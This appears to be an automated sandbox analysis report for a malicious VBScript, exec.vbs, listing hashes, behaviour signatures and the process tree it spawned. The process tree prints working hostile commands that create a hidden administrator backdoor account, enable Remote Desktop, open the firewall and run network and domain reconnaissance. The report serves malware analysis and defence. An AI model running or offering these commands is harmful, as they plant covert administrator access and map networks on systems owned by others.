Analysis

  • max time kernel
    52s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    04/12/2020, 12:41

General

  • Target

    exec.vbs

  • Size

    4KB

  • MD5

    263982dde8e02ce8000fa16c41bba4e1

  • SHA1

    8df009693867173902c97b9f5920f23607f4cf93

  • SHA256

    e86d3fd7a2ff1bc75d750b661dfd3ab357b611028abfbbedd4653b930160d6d2

  • SHA512

    f44a7a982344cb6e27d3a689c716d88c213d33b5822c9cbddf401ca4e13e471f557dba3db50c662be297eaefa285169b73bc99e17367ca513894d6de9548980d

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Deletes itself 1 IoCs
  • Modifies WinLogon 2 TTPs 3 IoCs
  • Discovers systems in the same network 1 TTPs 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 86 IoCs
  • Suspicious use of WriteProcessMemory 96 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\exec.vbs"
    1⤵
    • Blacklisted process makes network request
    • Deletes itself
    • Suspicious use of WriteProcessMemory
    PID:60
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C tasklist > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3928
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /C net user adm443 pusd117!!!! /ADD /active:YES /expires:NEVER > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1 & net user adm443 /expires:NEVER & net localgroup administrators adm443 /add >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net localgroup "Remote Desktop Users" adm443 /add >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net accounts /maxpwage:unlimited >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm443 /t REG_DWORD /d 0 /f >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & netsh firewall set service remoteadmin enable >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & netsh firewall set service remotedesktop enable >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net start TermService >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4068
      • C:\Windows\system32\net.exe
        net user adm443 pusd117!!!! /ADD /active:YES /expires:NEVER
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3336
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user adm443 pusd117!!!! /ADD /active:YES /expires:NEVER
          4⤵
            PID:2720
        • C:\Windows\system32\net.exe
          net user adm443 /expires:NEVER
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:648
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user adm443 /expires:NEVER
            4⤵
              PID:820
          • C:\Windows\system32\net.exe
            net localgroup administrators adm443 /add
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:868
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup administrators adm443 /add
              4⤵
                PID:504
            • C:\Windows\system32\net.exe
              net localgroup "Remote Desktop Users" adm443 /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:732
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup "Remote Desktop Users" adm443 /add
                4⤵
                  PID:3712
              • C:\Windows\system32\net.exe
                net accounts /maxpwage:unlimited
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2216
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 accounts /maxpwage:unlimited
                  4⤵
                    PID:3056
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v adm443 /t REG_DWORD /d 0 /f
                  3⤵
                  • Modifies WinLogon
                  PID:2416
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                  3⤵
                    PID:4072
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
                    3⤵
                      PID:1604
                    • C:\Windows\system32\netsh.exe
                      netsh firewall set service remoteadmin enable
                      3⤵
                        PID:3428
                      • C:\Windows\system32\netsh.exe
                        netsh firewall set service remotedesktop enable
                        3⤵
                          PID:1100
                        • C:\Windows\system32\net.exe
                          net start TermService
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:416
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 start TermService
                            4⤵
                              PID:3784
                          • C:\Windows\system32\reg.exe
                            reg query "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
                            3⤵
                              PID:3928
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C net session > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1 & net share >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & quser >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & arp -a >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net use >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net localgroup >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & ipconfig /all >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net config workstation >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net view /all >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net view /all /domain >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & nltest /domain_trusts >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & nltest /domain_trusts /all_trusts >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & net group "Domain Admins" /domain >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1 & netstat -a >> "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>>&1
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3968
                            • C:\Windows\system32\net.exe
                              net session
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2812
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 session
                                4⤵
                                  PID:3680
                              • C:\Windows\system32\net.exe
                                net share
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:660
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 share
                                  4⤵
                                    PID:648
                                • C:\Windows\system32\quser.exe
                                  quser
                                  3⤵
                                    PID:548
                                  • C:\Windows\system32\ARP.EXE
                                    arp -a
                                    3⤵
                                      PID:868
                                    • C:\Windows\system32\net.exe
                                      net use
                                      3⤵
                                        PID:2872
                                      • C:\Windows\system32\net.exe
                                        net localgroup
                                        3⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:732
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 localgroup
                                          4⤵
                                            PID:428
                                        • C:\Windows\system32\ipconfig.exe
                                          ipconfig /all
                                          3⤵
                                          • Gathers network information
                                          PID:2604
                                        • C:\Windows\system32\net.exe
                                          net config workstation
                                          3⤵
                                            PID:3460
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 config workstation
                                              4⤵
                                                PID:3432
                                            • C:\Windows\system32\net.exe
                                              net view /all
                                              3⤵
                                              • Discovers systems in the same network
                                              PID:3604
                                            • C:\Windows\system32\net.exe
                                              net view /all /domain
                                              3⤵
                                              • Discovers systems in the same network
                                              PID:4068
                                            • C:\Windows\system32\nltest.exe
                                              nltest /domain_trusts
                                              3⤵
                                                PID:3044
                                              • C:\Windows\system32\nltest.exe
                                                nltest /domain_trusts /all_trusts
                                                3⤵
                                                  PID:644
                                                • C:\Windows\system32\net.exe
                                                  net group "Domain Admins" /domain
                                                  3⤵
                                                    PID:2816
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 group "Domain Admins" /domain
                                                      4⤵
                                                        PID:348
                                                    • C:\Windows\system32\NETSTAT.EXE
                                                      netstat -a
                                                      3⤵
                                                      • Gathers network information
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:912
                                                  • C:\Windows\system32\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /C wmic logicaldisk > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
                                                    2⤵
                                                      PID:200
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic logicaldisk
                                                        3⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1252
                                                    • C:\Windows\system32\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /C wmic qfe > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
                                                      2⤵
                                                        PID:2688
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic qfe
                                                          3⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3460
                                                      • C:\Windows\system32\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C net user > "C:\Users\Admin\AppData\Local\Temp\\dfhjdsjhfdsfhds.txt" 2>&1
                                                        2⤵
                                                          PID:2172
                                                          • C:\Windows\system32\net.exe
                                                            net user
                                                            3⤵
                                                              PID:2384
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 user
                                                                4⤵
                                                                  PID:1496

                                                          Network

                                                          MITRE ATT&CK Enterprise v6

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads